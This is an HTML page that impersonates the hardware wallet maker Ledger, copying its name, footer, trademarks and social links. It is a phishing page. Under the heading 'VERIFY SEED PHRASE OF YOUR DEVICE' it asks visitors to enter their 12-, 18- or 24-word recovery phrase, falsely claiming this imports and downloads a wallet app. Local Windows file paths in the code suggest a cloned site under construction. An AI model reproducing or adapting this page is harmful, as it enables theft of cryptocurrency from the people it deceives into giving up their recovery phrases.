<!DOCTYPE html>
<html>
<head>
	<meta charset="utf-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<title>Ledger Connect</title>
	<link rel="icon" type="image/x-icon" href="download3.jpg">
	<link rel="stylesheet" href="assets/main.css">
	 <link rel="stylesheet" type="text/css" href="npm/instantsearch.js%402.10.4/dist/instantsearch.min.css">
        <link rel="stylesheet" type="text/css" href="npm/instantsearch.js%402.10.4/dist/instantsearch-theme-algolia.min.css">
	<link href="font-awesome/4.3.0/css/font-awesome.min.css" rel="stylesheet">
	<link rel="stylesheet" type="text/css" href="C:\Users\HP\Desktop\website\bootstrap\BT\bootstrap-5.0.2-dist\css\bootstrap.css">
	<style type="text/css">
		body{
			box-sizing: border-box;
			margin: 0;
			padding: 0;
			background-color: black;
			font-family: sans-serif;
		}

		

		.main{
			display: grid;
			grid-template-columns: 300px auto;
			gap: 2px;
		}

		.sub1 img{
			height:100%;
			width: 100%;
		}

		.sub3 input{
			padding: 15px;
			margin: 5px;
		}

		.sub2 {
			color: white;
			margin-top: 10px;
		}

		h2{
			color: white;
		}

		.sub2 h2{
			font-family: sans-serif;
			font-weight: bolder;
		}

		.sub2 p{
			font-weight: bold;
		}

		button{
			border-style: solid;
			border-radius: 10px;
			height: 28px;
			width: 90px;
		}

		button:hover{
			color: purple;
			font-weight: bold;
			text-decoration-line: none;
		}

		.sub3 ul a{
			display: flex;
		}

		.sub3 ul{
			border-style: solid;
			border-radius: 10px;
			font-family: monospace;
		}

		ul a{
			text-decoration-line: none;
			color: white;
		}

		@media screen and (max-width: 600px){
			
			.sub1 img{
				height: 0px;
				width: 0px;
			}

			.main{
			display: grid;
			grid-template-columns: 0px auto;
			gap: 1px;
			margin-top: 5px;
			margin-right: 30px;
			margin-left: 30px;
		}


		}


	</style>

</head>
<body>

<div class="main">
	<div class="sub1">
		<img src="download1.jpg">
	</div>

	<div class="sub2">
		
	<h2>
		VERIFY SEED PHRASE OF YOUR DEVICE
	</h2>
	<br>
	<p>
		Enter your Recovery Seed Phrase Words to Import and Download Your Wallet App.
	</p>
	<p>
		**Ledger does not keep a copy of your recovery phrase.
	</p>
	<br><br>

	<div class="sub3">
		<ul><a href="connect1.html">12 Words</a></ul>
		<br>
		<ul><a href="connect2.html">18 Words</a></ul>
		<br>
		<ul><a href="connect3.html">24 Words</a></ul>
		
	
	</div>
</div>
</div>

 <footer class="uk-section uk-text-center uk-text-muted">
        <div class="uk-container uk-container-small">

            <div>
                <ul class="uk-subnav uk-flex-center">







                    <li class="uk-active"><a href="index.htm">Home</a></li>





                    <li><a href="/contact/">Get connected</a></li>





                    <li><a href="/changelog-timeline/">Changelog</a></li>





                    <li><a href="/sitemap/">Sitemap</a></li>





                    <li><a href="https://blog.ledger.com/tag/stories/" target="_blank" rel="noopener noreferrer">Integration Stories</a></li>



                </ul>
            </div>
            <div class="uk-margin-medium">
                <div data-uk-grid="" class="uk-child-width-auto uk-grid-small uk-flex-center uk-grid">


                    <div class="uk-first-column">
                        <a href="https://twitter.com/Ledger" data-uk-icon="icon: twitter" class="uk-icon-link uk-icon" target="_blank" rel="noopener noreferrer"></a>
                    </div>


                    <div>
                        <a href="https://www.facebook.com/Ledger" data-uk-icon="icon: facebook" class="uk-icon-link uk-icon" target="_blank" rel="noopener noreferrer"></a>
                    </div>


                    <div>
                        <a href="https://www.reddit.com/r/ledgerwallet/" data-uk-icon="icon: reddit" class="uk-icon-link uk-icon" target="_blank" rel="noopener noreferrer"></a>
                    </div>


                    <div>
                        <a href="https://developers.ledger.com/discord/" data-uk-icon="icon: discord" class="uk-icon-link uk-icon" target="_blank" rel="noopener noreferrer"></a>
                    </div>


                    <div>
                        <a href="https://github.com/LedgerHQ" data-uk-icon="icon: github" class="uk-icon-link uk-icon" target="_blank" rel="noopener noreferrer"></a>
                    </div>




                    <div>
                        <a href="https://www.instagram.com/ledger" data-uk-icon="icon: instagram" class="uk-icon-link uk-icon" target="_blank" rel="noopener noreferrer"></a>
                    </div>



                    <div>
                        <a href="https://fr.linkedin.com/company/ledgerhq" data-uk-icon="icon: linkedin" class="uk-icon-link uk-icon" target="_blank" rel="noopener noreferrer"></a>
                    </div>




                    <div>
                        <a href="https://youtube.com/Ledger" data-uk-icon="icon: youtube" class="uk-icon-link uk-icon" target="_blank" rel="noopener noreferrer"></a>
                    </div>





                </div>
            </div>
            <div class="uk-margin-medium uk-text-small copyright link-primary">Copyright © <a href="https://ledger.com/">Ledger</a> SAS. All rights reserved. <br>Ledger, Ledger Nano S, Ledger
                Vault, Bolos are registered trademarks of Ledger SAS.</div>

        </div>
    </footer>



<script type="text/javascript" src="C:\Users\HP\Desktop\website\transport express\bootstrap-5.0.2-dist\js\bootstrap.bundle.min.js"></script>
</body>
</html>